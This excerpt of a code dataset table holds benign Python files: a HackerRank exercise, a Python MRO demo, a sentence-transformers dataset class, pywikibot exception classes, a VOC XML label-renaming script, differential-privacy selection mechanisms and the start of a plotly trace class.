content (string, 7-928k chars) | avg_line_length (float64, 3.5-33.8k) | max_line_length (int64, 6-139k) | alphanum_fraction (float64, 0.08-0.96) | licenses (sequence) | repository_name (string, 7-104 chars) | path (string, 4-230 chars) | size (int64, 7-928k bytes) | lang (1 value: Python) |
---|---|---|---|---|---|---|---|---|
#!/usr/bin/env python3
# Enter your code here. Read input from STDIN. Print output to STDOUT
def string_manipulate(string):
even_string=''
odd_string=''
for idx, val in enumerate(string):
if idx % 2 == 0:
even_string+=val
else:
odd_string+=val
return even_string+" "+odd_string
if __name__ == '__main__':
T = int(input().strip())
for t in range(T):
string = str(input().strip())
print(string_manipulate(string))
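# Worked example (hypothetical input, not part of the original submission):
# for T = 1 and the line "Hacker", the even-indexed characters give "Hce" and
# the odd-indexed characters give "akr", so the program prints "Hce akr".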
| 21.12 | 69 | 0.566288 | ["MIT"] | vas610/hackerrank-30daysofcode-python | day6.py | 528 | Python |
class A:
def foo(self):
print("A")
class B(A):
# def foo(self):
# print("B")
pass
class C(A):
def foo(self):
print("C")
super(C, self).foo()
class D(B, C):
def foo(self):
print("D")
super(D, self).foo()
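# Note (added for clarity): the method resolution order here is
# D -> B -> C -> A -> object. B defines no foo() of its own, so
# super(D, self).foo() falls through B to C.foo(), which in turn calls A.foo().
# Calling D().foo() therefore prints "D", "C", "A" on separate lines.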
if __name__ == '__main__':
d = D()
d.foo()
| 13.12 | 28 | 0.445122 | ["MIT"] | jiauy/before_work | PythonAndOop/N42_super_3.py | 328 | Python |
from torch.utils.data import Dataset
from typing import List
import torch
from .. import SentenceTransformer
from ..readers.InputExample import InputExample
class SentencesDataset(Dataset):
"""
Dataset for smart batching, that is each batch is only padded to its longest sequence instead of padding all
sequences to the max length.
The SentenceBertEncoder.smart_batching_collate is required for this to work.
SmartBatchingDataset does *not* work without it.
"""
def __init__(self,
examples: List[InputExample],
model: SentenceTransformer
):
"""
Create a new SentencesDataset with the tokenized texts and the labels as Tensor
:param examples:
A list of sentence_transformers.readers.InputExample
:param model:
SentenceTransformerModel
"""
self.model = model
self.examples = examples
self.label_type = torch.long if isinstance(self.examples[0].label, int) else torch.float
def __getitem__(self, item):
label = torch.tensor(self.examples[item].label, dtype=self.label_type)
if self.examples[item].texts_tokenized is None:
self.examples[item].texts_tokenized = [self.model.tokenize(text) for text in self.examples[item].texts]
return self.examples[item].texts_tokenized, label
def __len__(self):
return len(self.examples)
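# Minimal usage sketch (illustrative only; assumes an already-loaded
# SentenceTransformer `model` from the surrounding package). The DataLoader
# must use the model's smart batching collate function for the per-batch
# padding described in the class docstring:
#
#   from torch.utils.data import DataLoader
#   examples = [InputExample(texts=['first sentence', 'second sentence'], label=0.8)]
#   dataset = SentencesDataset(examples, model)
#   loader = DataLoader(dataset, batch_size=16,
#                       collate_fn=model.smart_batching_collate)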
| 35.195122 | 115 | 0.680527 | ["MIT"] | 21WelfareForEveryone/WelfareForEveryOne | ai/KoSentenceBERTchatbot/KoSentenceBERT/sentence_transformers/datasets/SentencesDataset.py | 1,443 | Python |
# -*- coding: utf-8 -*-
"""
Exception and warning classes used throughout the framework.
Error: Base class, all exceptions should be subclasses of this class.
- NoUsername: Username is not in user-config.py, or it is invalid.
- UserBlocked: Username or IP has been blocked
- AutoblockUser: requested action on a virtual autoblock user not valid
- UserRightsError: insufficient rights for requested action
- BadTitle: Server responded with BadTitle
- InvalidTitle: Invalid page title
- CaptchaError: Captcha is asked and config.solve_captcha == False
- Server504Error: Server timed out with HTTP 504 code
- i18n.TranslationError: i18n/l10n message not available
- UnknownExtension: Extension is not defined for this site
SiteDefinitionError: Site loading problem
- UnknownSite: Site does not exist in Family
- UnknownFamily: Family is not registered
PageRelatedError: any exception which is caused by an operation on a Page.
- NoPage: Page does not exist
- UnsupportedPage: Page is not supported due to a namespace restriction
- IsRedirectPage: Page is a redirect page
- IsNotRedirectPage: Page is not a redirect page
- CircularRedirect: Page is a circular redirect
- InterwikiRedirectPage: Page is a redirect to another site
- SectionError: The section specified by # does not exist
- NotEmailableError: The target user has disabled email
- NoMoveTarget: An expected move target page does not exist
PageLoadRelatedError: any exception which happens while loading a Page.
- InconsistentTitleReceived: Page receives a title inconsistent with query
PageSaveRelatedError: page exceptions within the save operation on a Page
(alias: PageNotSaved).
- SpamfilterError: MediaWiki spam filter detected a blacklisted URL
- TitleblacklistError: MediaWiki detected a blacklisted page title
- OtherPageSaveError: misc. other save related exception.
- LockedPage: Page is locked
- LockedNoPage: Title is locked against creation
- CascadeLockedPage: Page is locked due to cascading protection
- EditConflict: Edit conflict while uploading the page
- PageDeletedConflict: Page was deleted since being retrieved
- PageCreatedConflict: Page was created by another user
- ArticleExistsConflict: Page article already exists
- NoCreateError: parameter nocreate does not allow page creation
ServerError: a problem with the server.
- FatalServerError: A fatal/non-recoverable server error
WikiBaseError: any issue specific to Wikibase.
- CoordinateGlobeUnknownException: globe is not implemented yet.
- EntityTypeUnknownException: entity type is not available on the site.
TimeoutError: request failed with a timeout
DeprecationWarning: old functionality replaced by new functionality
PendingDeprecationWarning: problematic code which has not yet been
fully deprecated, possibly because a replacement is not available
RuntimeWarning: problems developers should have fixed, and users need to
be aware of their status.
- tools._NotImplementedWarning: do not use
- NotImplementedWarning: functionality not implemented
UserWarning: warnings targeted at users
- config2._ConfigurationDeprecationWarning: user configuration file problems
- login._PasswordFileWarning: password file problems
- ArgumentDeprecationWarning: command line argument problems
- FamilyMaintenanceWarning: missing information in family definition
"""
#
# (C) Pywikibot team, 2008-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.tools import (
# __ to avoid conflict with ModuleDeprecationWrapper._deprecated
deprecated as __deprecated,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
UnicodeMixin,
UnicodeType,
_NotImplementedWarning,
)
class NotImplementedWarning(_NotImplementedWarning):
"""Feature that is no longer implemented."""
pass
class ArgumentDeprecationWarning(UserWarning):
"""Command line argument that is no longer supported."""
pass
class FamilyMaintenanceWarning(UserWarning):
"""Family class is missing definitions."""
pass
class Error(UnicodeMixin, Exception):
"""Pywikibot error."""
# NOTE: UnicodeMixin must be the first object Error class is derived from.
def __init__(self, arg):
"""Initializer."""
self.unicode = arg
def __unicode__(self):
"""Return a unicode string representation."""
return self.unicode
class PageRelatedError(Error):
"""
Abstract Exception, used when the exception concerns a particular Page.
This class should be used when the Exception concerns a particular
Page, and when a generic message can be written once for all.
"""
# Preformatted UNICODE message where the page title will be inserted
# Override this in subclasses.
# 'Oh noes! Page %s is too funky, we should not delete it ;('
message = None
def __init__(self, page, message=None):
"""
Initializer.
@param page: Page that caused the exception
@type page: Page object
"""
if message:
self.message = message
if self.message is None:
raise Error("PageRelatedError is abstract. Can't instantiate it!")
self.page = page
self.title = page.title(as_link=True)
self.site = page.site
if '%(' in self.message and ')s' in self.message:
super(PageRelatedError, self).__init__(
self.message % self.__dict__)
else:
super(PageRelatedError, self).__init__(self.message % page)
def getPage(self):
"""Return the page related to the exception."""
return self.page
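# Illustrative subclass (not part of the original module): a concrete
# PageRelatedError only needs to provide a preformatted `message`; the
# '%(title)s'-style placeholders are filled from the exception's attributes,
# while a bare '%s' is filled with the page itself.
#
#   class MyPageError(PageRelatedError):
#       """Raised for demonstration purposes."""
#       message = 'Something is wrong with %(title)s on %(site)s.'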
class PageSaveRelatedError(PageRelatedError):
"""Saving the page has failed."""
message = 'Page %s was not saved.'
# This property maintains backwards compatibility with
# the old PageNotSaved which inherited from Error
# (not PageRelatedError) and exposed the normal 'args'
# which could be printed
@property
def args(self):
"""Expose args."""
return UnicodeType(self)
class OtherPageSaveError(PageSaveRelatedError):
"""Saving the page has failed due to uncatchable error."""
message = 'Edit to page %(title)s failed:\n%(reason)s'
def __init__(self, page, reason):
"""Initializer.
@param reason: Details of the problem
@type reason: Exception or basestring
"""
self.reason = reason
super(OtherPageSaveError, self).__init__(page)
@property
def args(self):
"""Expose args."""
return UnicodeType(self.reason)
class NoUsername(Error):
"""Username is not in user-config.py."""
pass
class NoPage(PageRelatedError):
"""Page does not exist."""
message = "Page %s doesn't exist."
pass
class UnsupportedPage(PageRelatedError):
"""Unsupported page due to namespace restriction."""
# namespaces < 0 aren't supported (T169213)
message = 'Page %s is not supported due to namespace restriction.'
pass
class NoMoveTarget(PageRelatedError):
"""Expected move target page not found."""
message = 'Move target page of %s not found.'
pass
class PageLoadRelatedError(PageRelatedError):
"""Loading the contents of a Page object has failed."""
message = 'Page %s was not loaded.'
class InconsistentTitleReceived(PageLoadRelatedError):
"""Page receives a title inconsistent with query."""
def __init__(self, page, actual):
"""Initializer.
@param page: Page that caused the exception
@type page: Page object
@param actual: title obtained by query
@type actual: basestring
"""
self.message = "Query on %s returned data on '{0}'".format(actual)
super(InconsistentTitleReceived, self).__init__(page)
class SiteDefinitionError(Error):
"""Site does not exist."""
pass
# The name 'NoSuchSite' was used for all site related issues,
# and it used message "Site does not exist".
# These are retained for backwards compatibility with scripts.
NoSuchSite = SiteDefinitionError
class UnknownSite(SiteDefinitionError):
"""Site does not exist in Family."""
pass
class UnknownFamily(SiteDefinitionError):
"""Family is not registered."""
pass
class UnknownExtension(Error, NotImplementedError):
"""Extension is not defined."""
pass
class IsRedirectPage(PageRelatedError):
"""Page is a redirect page."""
message = 'Page %s is a redirect page.'
pass
class IsNotRedirectPage(PageRelatedError):
"""Page is not a redirect page."""
message = 'Page %s is not a redirect page.'
pass
class CircularRedirect(PageRelatedError):
"""Page is a circular redirect.
Exception argument is the redirect target; this may be the same title
as this page or a different title (in which case the target page directly
or indirectly redirects back to this one)
"""
message = 'Page %s is a circular redirect.'
class InterwikiRedirectPage(PageRelatedError):
"""
Page is a redirect to another site.
This is considered invalid in Pywikibot. See bug T75184.
"""
message = ('Page redirects to a page on another Site.\n'
'Page: %(page)s\n'
'Target page: %(target_page)s on %(target_site)s.')
def __init__(self, page, target_page):
"""Initializer.
@param target_page: Target page of the redirect.
@type target_page: Page
"""
self.target_page = target_page
self.target_site = target_page.site
super(InterwikiRedirectPage, self).__init__(page)
class InvalidTitle(Error):
"""Invalid page title."""
pass
class LockedPage(PageSaveRelatedError):
"""Page is locked."""
message = 'Page %s is locked.'
pass
class LockedNoPage(LockedPage):
"""Title is locked against creation."""
message = 'Page %s does not exist and is locked preventing creation.'
pass
class CascadeLockedPage(LockedPage):
"""Page is locked due to cascading protection."""
message = 'Page %s is locked due to cascading protection.'
pass
class SectionError(Error):
"""The section specified by # does not exist."""
pass
PageNotSaved = PageSaveRelatedError
class NoCreateError(PageSaveRelatedError):
"""Parameter nocreate doesn't allow page creation."""
message = 'Page %s could not be created due to parameter nocreate'
pass
class EditConflict(PageSaveRelatedError):
"""There has been an edit conflict while uploading the page."""
message = 'Page %s could not be saved due to an edit conflict'
pass
class PageDeletedConflict(EditConflict):
"""Page was deleted since being retrieved."""
message = 'Page %s has been deleted since last retrieved.'
pass
class PageCreatedConflict(EditConflict):
"""Page was created by another user."""
message = 'Page %s has been created since last retrieved.'
pass
class ArticleExistsConflict(EditConflict):
"""Page already exists."""
message = ('Destination article %s already exists and is not a redirect '
'to the source article')
pass
class SpamfilterError(PageSaveRelatedError):
"""Page save failed because MediaWiki detected a blacklisted spam URL."""
message = ('Edit to page %(title)s rejected by spam filter due to '
'content:\n%(url)s')
def __init__(self, page, url):
"""Initializer."""
self.url = url
super(SpamfilterError, self).__init__(page)
class TitleblacklistError(PageSaveRelatedError):
"""Page save failed because MediaWiki detected a blacklisted page title."""
message = 'Page %s is title-blacklisted.'
pass
class ServerError(Error):
"""Got unexpected server response."""
pass
class FatalServerError(ServerError):
"""A fatal server error will not be corrected by resending the request."""
pass
class Server504Error(ServerError):
"""Server timed out with HTTP 504 code."""
pass
class Server414Error(ServerError):
"""Server returned with HTTP 414 code."""
pass
class BadTitle(Error):
"""Server responded with BadTitle."""
pass
# UserBlocked exceptions should in general not be caught. If the bot has
# been blocked, the bot operator should address the reason for the block
# before continuing.
class UserBlocked(Error):
"""Your username or IP has been blocked."""
pass
class CaptchaError(Error):
"""Captcha is asked and config.solve_captcha == False."""
pass
class AutoblockUser(Error):
"""Requested action on a virtual autoblock user not valid.
This exception is raised whenever an action is requested on a virtual
autoblock user for which it is not available (i.e. roughly everything
except unblock).
"""
pass
class UserRightsError(Error):
"""Insufficient user rights to perform an action."""
pass
class HiddenKeyError(UserRightsError, KeyError):
"""Insufficient user rights to view the hidden key."""
pass
class NotEmailableError(PageRelatedError):
"""This user is not emailable."""
message = '%s is not emailable.'
pass
class WikiBaseError(Error):
"""Wikibase related error."""
pass
class CoordinateGlobeUnknownException(WikiBaseError, NotImplementedError):
"""This globe is not implemented yet in either WikiBase or pywikibot."""
pass
class EntityTypeUnknownException(WikiBaseError):
"""The requested entity type is not recognised on this site."""
pass
class TimeoutError(Error):
"""Request failed with a timeout error."""
pass
@__deprecated(since='20141214')
class DeprecatedPageNotFoundError(Error):
"""Page not found (deprecated)."""
pass
@__deprecated(since='20141218')
class _EmailUserError(UserRightsError, NotEmailableError):
"""Email related error."""
pass
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr(
'UploadWarning',
replacement_name='pywikibot.data.api.UploadWarning',
warning_message='pywikibot.exceptions.UploadWarning is deprecated; '
'use APISite.upload with a warning handler instead.',
since='20150921')
wrapper._add_deprecated_attr('PageNotFound', DeprecatedPageNotFoundError,
warning_message='{0}.{1} is deprecated, and no '
'longer used by pywikibot; use '
'http.fetch() instead.',
since='20141214')
wrapper._add_deprecated_attr(
'UserActionRefuse', _EmailUserError,
warning_message='UserActionRefuse is deprecated; '
'use UserRightsError and/or NotEmailableError',
since='20141218')
| 24.122383 | 79 | 0.696262 | ["MIT"] | 5j9/pywikibot-core | pywikibot/exceptions.py | 14,980 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 3/5/2018 1:49 PM
# @Author : sunyonghai
# @File : xml_utils.py
# @Software: ZJ_AI
# This script is used to edit XML files
# =========================================================
import random
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import Element
import os
import cv2
from data_processing.utils.io_utils import *
def read_xml(in_path):
'''Read and parse an XML file.
in_path: path to the XML file
return: ElementTree'''
# tree = ET()
tree = ET.parse(in_path)
return tree
def write_xml(tree, out_path):
'''Write the XML tree out to a file.
tree: the XML tree
out_path: output path'''
tree.write(out_path, encoding="utf-8",xml_declaration=True)
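# Round-trip sketch (hypothetical file names): parse an existing document and
# write it back out unchanged.
#   tree = read_xml('input.xml')
#   write_xml(tree, 'output.xml')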
def if_match(node, kv_map):
'''Check whether a node contains all of the given attributes with matching values.
node: the node
kv_map: map of attribute names to expected values'''
for key in kv_map:
if node.get(key) != kv_map.get(key):
return False
return True
# ---------------search -----
def find_nodes(tree, path):
'''Find all nodes matching the given path.
tree: the XML tree
path: node path'''
return tree.findall(path)
def get_node_by_keyvalue(nodelist, kv_map):
'''Locate nodes matching the given attributes and values, and return them.
nodelist: list of nodes
kv_map: map of attribute names and values to match'''
result_nodes = []
for node in nodelist:
if if_match(node, kv_map):
result_nodes.append(node)
return result_nodes
# ---------------change -----
def change_node_properties(nodelist, kv_map, is_delete=False):
'''Modify / add / delete the attributes and attribute values of the nodes.
nodelist: list of nodes
kv_map: map of attribute names and values'''
for node in nodelist:
for key in kv_map:
if is_delete:
if key in node.attrib:
del node.attrib[key]
else:
node.set(key, kv_map.get(key))
def change_node_text(nodelist, text, is_add=False, is_delete=False):
'''Change / append to / delete the text of the nodes.
nodelist: list of nodes
text: the updated text'''
for node in nodelist:
if is_add:
node.text += text
elif is_delete:
node.text = ""
else:
node.text = text
def create_node(tag, property_map, content):
'''Create a new node.
tag: node tag
property_map: map of attribute names and values
content: text content inside the node's opening and closing tags
return: the new node'''
element = Element(tag, property_map)
element.text = content
return element
def add_child_node(nodelist, element):
'''Append a child node to each node in the list.
nodelist: list of nodes
element: the child node'''
for node in nodelist:
node.append(element)
def del_node_by_tagkeyvalue(nodelist, tag, kv_map):
'''Locate a child node by tag plus attributes and values, and delete it.
nodelist: list of parent nodes
tag: child node tag
kv_map: map of attribute names and values'''
for parent_node in nodelist:
children = parent_node.getchildren()
for child in children:
if child.tag == tag and if_match(child, kv_map):
parent_node.remove(child)
#
# if __name__ == "__main__":
# # 1. Read the XML file
# tree = read_xml("./test.xml")
#
# # 2. Modify attributes
# # A. Find the parent nodes
# nodes = find_nodes(tree, "processers/processer")
# # B. Locate the target child nodes precisely by attribute
# result_nodes = get_node_by_keyvalue(nodes, {"name": "BProcesser"})
# # C. Modify node attributes
# change_node_properties(result_nodes, {"age": "1"})
# # D. Delete node attributes
# change_node_properties(result_nodes, {"value": ""}, True)
#
# # 3. Modify nodes
# # A. Create a new node
# a = create_node("person", {"age": "15", "money": "200000"}, "this is the first content")
# # B. Insert it under the parent nodes
# add_child_node(result_nodes, a)
#
# # 4. Delete nodes
# # Locate the parent nodes
# del_parent_nodes = find_nodes(tree, "processers/services/service")
# # Precisely locate the child node and delete it
# target_del_node = del_node_by_tagkeyvalue(del_parent_nodes, "chain", {"sequency": "chain1"})
#
# # 5. Modify node text
# # Locate the nodes
# text_nodes = get_node_by_keyvalue(find_nodes(tree, "processers/services/service/chain"), {"sequency": "chain3"})
# change_node_text(text_nodes, "new text")
#
# # 6. Write the result to an output file
# write_xml(tree, "./out.xml")
#
def modify_label_name(input_path):
# train VOC2012
data_paths = [os.path.join(input_path,s) for s in ['train_data']]
print('Parsing annotation files')
for data_path in data_paths:
annot_path = os.path.join(data_path, 'Annotations')
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
print(node.text)
class_name = element_obj.find('name').text
if class_name == 'mn-zgl-pz-cmw-250ml': # 1
node.text = 'mn-zgl-hz-cmw-250ml'
# if class_name == 'kkklgz330ml': # 1
# node.text = 'kkkl-kkkl-gz-yw-330ml'
# elif class_name == 'nfsq550ml': #2
# node.text = 'nfsq-nfsq-pz-yw-550ml'
# elif class_name == 'jdbpz500ml': #3
# node.text = 'jdb-jdb-pz-yw-500ml'
# elif class_name == 'wljgz310ml': #4
# node.text = 'wlj-wlj-gz-yw-310ml'
# elif class_name == 'wtnmcgz310ml': #5
# node.text = 'wt-wtnmc-gz-yw-310ml'
# elif class_name == 'ybpz550ml': #6
# node.text = 'yb-yb-pz-yw-550ml'
# elif class_name == 'mdpzqn600ml': #7
# node.text = 'md-md-pz-qn-600ml'
# elif class_name == 'xbgz330ml': #8
# node.text = 'xb-xb-gz-yw-330ml'
# elif class_name == 'fdgz330ml': #9
# node.text = 'fd-fd-gz-yw-330ml'
# elif class_name == 'bsklpz600ml': #10
# node.text = 'bskl-bskl-pz-yw-600ml'
# elif class_name == 'tdyhgz330ml': #11
# node.text = 'tdyh-tdyh-gz-yw-330ml'
# elif class_name == 'qxgz330ml': #12
# node.text = 'qx-qx-gz-yw-330ml'
# elif class_name == 'bwpjgz550ml': #13
# node.text = 'bw-pj-gz-yw-550ml'
# elif class_name == 'qdpjgz330ml': #14
# node.text = 'qdpj-qdpj-gz-yw-330ml'
# elif class_name == 'qoo310ml': #15
# node.text = 'qoo-qoo-gz-yw-310ml'
# elif class_name == 'jtpz560ml': #16
# node.text = 'jt-jt-pz-yw560ml'
# elif class_name == 'mndgz330ml': #17
# node.text = 'mnd-mnd-gz-yw-330ml'
# elif class_name == 'mndgz380ml': #18
# node.text = 'mnd-mnd-gz-yw-380ml'
# elif class_name == 'blcypz550ml': #19
# node.text = 'blcy-blcy-pz-yw-550ml'
# else:
# node.text = 'other' #20
print(node.text)
write_xml(et, annot)
except Exception as e:
print('Exception in pascal_voc_parser: {}'.format(e))
continue
def modify2_label_name(input_path):
# train VOC2012
#dirs = []
#data_paths = [os.path.join(input_path,s) for s in dirs]
# data_paths = [os.path.join(input_path,s) for s in ['train_data-2018-3-20_1']]
print('Parsing annotation files')
#for data_path in data_paths:
annot_path = input_path
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
class_name = element_obj.find('name').text
if class_name == 'yd-ydmtcqscm-pz-cmw-56g':
print(node.text)
print(annot)
node.text = 'yd-ydwtkxt-pz-qscmw-56g'
#print(node.text)
elif class_name == 'htk-tls-dz-hd-288g':
print(node.text)
print(annot)
node.text = 'htk-tls-dz-hdw-288g'
print(node.text)
elif class_name == 'hwd-hwdfbm-tz-hxw-75g':
print(node.text)
print(annot)
node.text = 'hwd-hwdfbm-tz-hxw-84g'
print(node.text)
elif class_name == 'df-dfqkl-dz-zrqkl--43g':
print(node.text)
print(annot)
node.text = 'df-dfqkl-dz-zrqkl-43g'
print(node.text)
# elif class_name == 'mn-zgl-pz-cmw-250ml': # 1
# print(node.text)
# print(annot)
# node.text = 'mn-zgl-hz-cmw-250ml'
# print(node.text)
# elif class_name == 'None': # 1
# print(node.text)
# print(annot)
# node.text = 'yb-ybcjs-pz-yw-555ml'
# print(node.text)
# elif class_name == 'db-jdblc-gz-yw-310ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdblc-gz-yw-310ml'
# print(node.text)
# elif class_name == 'jdb-jdblc-pz-yw-500ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdb-pz-yw-500ml'
# print(node.text)
# elif class_name == 'wlj-wljlc-dz-yw-250ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdb-pz-yw-500ml'
# print(node.text)
# elif class_name == 'mn-zgl-pz-cmw-250ml': # 1
# node.text = 'mn-zgl-hz-cmw-250ml'
# print(node.text)
# elif class_name == 'yl-ylcnn-pz-yw-250ml': #2
# node.text = 'yl-ylcnn-hz-yw-250ml'
# elif class_name == 'lzs-rnbdwhbg-bz-nlw-145g': #3
# node.text = 'lzs-rnbdwhbg-hz-nlw-145g'
# elif class_name == 'ksf-ksfbg-bz-qxnmw-125g': #3
# node.text = 'ksf-ksfbg-dz-qxnmw-125g'
# elif class_name == 'lfe-lfeyrbttgsq-dz-yrbtr-30g': #4
# node.text = 'lfe-lfeyrbttgsq-hz-yrbtr-30g'
# elif class_name == 'df-dfqkl-bz-zrqkl--43g': #5
# node.text = 'df-dfqkl-dz-zrqkl--43g'
# elif class_name == 'slj-sljqkl-bz-hsjx-35g': #6
# node.text = 'slj-sljqkl-dz-hsjx-35g'
# elif class_name == 'ls-lssp-bz-mgjdyw-70g': #7
# node.text = 'ls-lssp-dz-mgjdyw-70g'
# elif class_name == 'wtn-wtnywdn-pz-yw-250ml': #8
# node.text = 'wtn-wtnywdn-hz-yw-250ml'
# elif class_name == 'ksf-ksfhsnrm-tz-nr-105g': #9
# node.text = 'ty-tyhsnrm-tz-nr-105g'
# elif class_name == 'ty-tyltscnrm-tz-scnr-82.5g': #10
# node.text = 'ksf-ksfltscnrm-tz-scnr-82.5g'
# elif class_name == 'yj-pjfz-bz-sjw-100g': #11
# node.text = 'yj-pjfz-dz-sjw-100g'
# elif class_name == 'jb-jbjyz-bz-yw-95g': #12
# node.text = 'jb-jbjyz-dz-yw-95g'
# elif class_name == 'wwsp-wwxxs-bz-yw-60g': #13
# node.text = 'wwsp-wwxxs-dz-yw-60g'
write_xml(et, annot)
except Exception as e:
print('Exception in pascal_voc_parser: {}'.format(e))
continue
def get_split():
str = 'blcy-blcy-pz-yw-550ml'
class_name = str.split('-')[2]
print(class_name)
def get_imagenamge_by_label(input_path):
data_paths = [os.path.join(input_path,s) for s in ['train_data-2018-3-7']]
for data_path in data_paths:
annot_path = os.path.join(data_path, 'Annotations')
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
class_name = element_obj.find('name').text
if class_name == 'qdpj-qdpj-gz-yw-330ml':
print(annot)
except Exception as ex:
print(ex)
# if __name__ == "__main__":
# input_path = 'data/'
# modify_label_name(input_path)
# if __name__ == "__main__":
# input_path = 'data/train_data-2018-3-7/'
# rename_image(input_path)
# if __name__ == "__main__":
# get_split()
# if __name__ == "__main__":
# input_path = 'data/all_data/'
# create_Main(input_path)
if __name__ == "__main__":
input_path = 'D:\\all_data\\predict_data-2018-05-11\\Annotations'
modify2_label_name(input_path)
# if __name__ == "__main__":
# input_path = 'data/'
# get_imagenamge_by_label(input_path)
| 36.15748 | 118 | 0.496225 | ["MIT"] | FMsunyh/re_com | development/server/algorithm/tf_faster_rcnn/data_processing/utils/xml_utils.py | 14,434 | Python |
import numpy as np
from collections import defaultdict
from scipy.optimize import minimize_scalar, root_scalar, bracket
from scipy.special import logsumexp
def em_worst_expected_error(n=2, eps=1, delta=1):
def foo(p):
return np.log(p) * (1 - 1 / (1 + (n-1)*p))
a = -minimize_scalar(lambda p: foo(p), bounds=(0,1), method='bounded').fun
return a * 2 * delta / eps
def pf_worst_expected_error(n=2, eps=1, delta=1):
def foo(p):
return np.log(p) * (1 - (1 - (1-p)**n) / (n*p))
a = -minimize_scalar(lambda p: foo(p), bounds=(0,1), method='bounded').fun
return a * 2 * delta / eps
def pf_pmf(q, eps=1.0, sensitivity=1.0, monotonic=False):
coef = 1.0 if monotonic else 0.5
p = np.exp(coef*eps/sensitivity*(q - q.max()))
n = q.size
# first we will calculate
# sum(prod(p_i, i in S), |S| = k) for each k
subsets = np.zeros(n)
curr = np.cumsum(p)
subsets[0] = curr[-1]
for j in range(1,n):
curr[j:] = np.cumsum(curr[j-1:-1]*p[j:])
subsets[j] = curr[-1]
# coefficient vector: (-1)^k / (k+1) for k = 1..n
coef = (np.arange(n) % 2 * 2 - 1) / (np.arange(n)+2)
# we will now calculate
# sum(prod(p_i, i in S), |S| = k, r not in S)
# and compute the final probabilities
ans = np.zeros(n)
for i in range(n):
new = np.copy(subsets)
new[0] -= p[i]
for j in range(1,n):
new[j] -= new[j-1]*p[i]
ans[i] = p[i] * (1 + new @ coef)
return ans
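# Added note: pf_pmf computes the exact selection probabilities of the
# permute-and-flip mechanism implemented by pf() further below. The `subsets`
# array holds the elementary symmetric sums of the p_i, and the alternating
# `coef` vector combines them in an inclusion-exclusion style sum, so that
# ans[i] = p_i * sum_k (-1)^k / (k+1) * e_k(p without p_i).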
def em_pmf(q, eps=1.0, sensitivity=1.0, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
logits = coef*eps/sensitivity*q
return np.exp(logits - logsumexp(logits))
#p = np.exp(coef*eps/sensitivity*q)
#return p / p.sum()
def em(q, eps=1.0, sensitivity=1.0, prng=np.random, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
p = np.exp(coef*eps/sensitivity*q)
p /= p.sum()
return prng.choice(p.size, p=p)
def pf(q, eps=1.0, sensitivity=1.0, prng=np.random, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
p = np.exp(coef*eps/sensitivity*q)
for i in prng.permutation(p.size):
if prng.rand() <= p[i]:
return i
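# Usage sketch (hypothetical quality scores): draw an index with each mechanism
# and compare their exact probability mass functions.
#   q = np.array([1.0, 3.0, 2.0])
#   i_em, i_pf = em(q, eps=0.5), pf(q, eps=0.5)
#   p_em, p_pf = em_pmf(q, eps=0.5), pf_pmf(q, eps=0.5)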
def expected_error(q, eps, pmf=em_pmf):
# compute the expected error of the mechanism (given its probability mass function)
ans = q.max() - pmf(q,eps) @ q
maxerr = q.max() - q.mean()
if ans > maxerr or ans < 0:
return maxerr
return ans
def variance(q, eps, pmf=em_pmf):
e = expected_error(q, eps, pmf)
return pmf(q, eps) @ (q.max() - q)**2 - e**2
def expected_epsilon(q, err, bounds=None, pmf=em_pmf):
# compute the epsilon required to achieve a given expected error
foo = lambda eps: expected_error(q, eps, pmf) - err
if bounds is None:
eps = 1.0
while foo(eps) > 0:
eps *= 2
while foo(eps) < 0:
eps /= 2.0
bounds = [eps,2*eps]
return root_scalar(foo,bracket=bounds,method='bisect').root
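# Example (hypothetical numbers): the epsilon the exponential mechanism needs
# to reach an expected error of 0.5 on the score vector [1, 3, 2]; the bracket
# is found automatically by the doubling/halving loop above.
#   eps_needed = expected_epsilon(np.array([1.0, 3.0, 2.0]), err=0.5, pmf=em_pmf)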
def max_epsilon_ratio(q):
def foo(eps):
err = expected_error(q, eps, pf_pmf)
eps2 = expected_epsilon(q, err, [eps, 2*eps])
return -eps2/eps
br = bracket(foo, 1e-3, 1.0)[0:3]
ans = minimize_scalar(foo, bracket=br, method='brent')
eps0 = ans.x
err = expected_error(q, eps0, pf_pmf)
eps1 = expected_epsilon(q, err, [eps0, 2*eps0])
return eps0, err, eps1
| 29.403361 | 88 | 0.575879 | ["MIT"] | gonzalo-munillag/Exponential_Randomised_Response | Experiments/mechanisms.py | 3,499 | Python |
from plotly.basedatatypes import BaseTraceType as _BaseTraceType
import copy as _copy
class Histogram2dContour(_BaseTraceType):
# class properties
# --------------------
_parent_path_str = ""
_path_str = "histogram2dcontour"
_valid_props = {
"autobinx",
"autobiny",
"autocolorscale",
"autocontour",
"bingroup",
"coloraxis",
"colorbar",
"colorscale",
"contours",
"customdata",
"customdatasrc",
"histfunc",
"histnorm",
"hoverinfo",
"hoverinfosrc",
"hoverlabel",
"hovertemplate",
"hovertemplatesrc",
"ids",
"idssrc",
"legendgroup",
"legendgrouptitle",
"legendrank",
"line",
"marker",
"meta",
"metasrc",
"name",
"nbinsx",
"nbinsy",
"ncontours",
"opacity",
"reversescale",
"showlegend",
"showscale",
"stream",
"textfont",
"texttemplate",
"type",
"uid",
"uirevision",
"visible",
"x",
"xaxis",
"xbingroup",
"xbins",
"xcalendar",
